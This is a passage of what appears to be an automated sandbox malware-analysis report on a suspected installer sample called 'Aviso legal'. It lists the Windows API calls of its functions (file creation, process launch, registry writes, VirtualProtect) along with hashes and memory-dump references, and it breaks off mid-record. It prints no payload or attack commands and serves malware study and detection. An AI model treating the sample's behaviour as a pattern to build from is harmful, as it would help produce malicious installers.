CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Function 705B2B98 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000), ref: 705B2C57

Memory Dump Source

Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true

Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d35564401f2753be1f67541058d8f3f4f96d89215aa1b1b6618dbc3662c92648
Instruction ID: 24a8fe4eaec7b2e938468b36b98e78917c21737544719e515dcbdef122ea01e8
Opcode Fuzzy Hash: d35564401f2753be1f67541058d8f3f4f96d89215aa1b1b6618dbc3662c92648
Instruction Fuzzy Hash: AE418F72504288EFDB5AAF65DD8AB5D3F74FB94350F30892AE505C6120DA3CBC819BB1

Function 0040167B Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 00401696

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
Instruction ID: 97031ceaf8e9c96da62d10e645a43f8a4e886df5684b2e10da682d8a0e9c10a3
Opcode Fuzzy Hash: 37dd8d0ca5ccfa2b7dc85521419f1992b48514a6c3f6d2a4e9192acb65122244
Instruction Fuzzy Hash: C3F09631A08124E6CB117BA69E4DE5E21549F82364B24063FF011B11D1D9BCC902659E

Function 00401FA4 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000,00425A20,75E023A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00403418), ref: 004055FA
Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll), ref: 0040560C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A

Part of subcall function 00405B20: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000,00000000), ref: 00405B49
Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56

FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
Part of subcall function 004069B5: GetExitCodeProcess.KERNEL32(?,?), ref: 004069E8

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 1543427666-0
Opcode ID: 5953877b6410b482209df80f50a5fc1a362c20bdcc401faed897dac012a701f2
Instruction ID: a015d294fcb9cc4e365613bb9e09bf6e78b00889af70ee47f703a6c6056ea9c8
Opcode Fuzzy Hash: 5953877b6410b482209df80f50a5fc1a362c20bdcc401faed897dac012a701f2
Instruction Fuzzy Hash: 2DF09072904112EBCB21BBA59A84EDE76E8DF01318F25403BE102B21D1D77C4E429A6E

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Function 705B2A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(705B505C,00000004,00000040,705B504C), ref: 705B2A9D

Memory Dump Source

Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true

Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 311473441ba07ec432215f1b11bc05ee6e4f4e5aa4f2d800245adb71a230f7b6
Instruction ID: 0816c0483dfd890899e116d980ac4ed781dfeb11343fcf51072dc9cb371b0db4
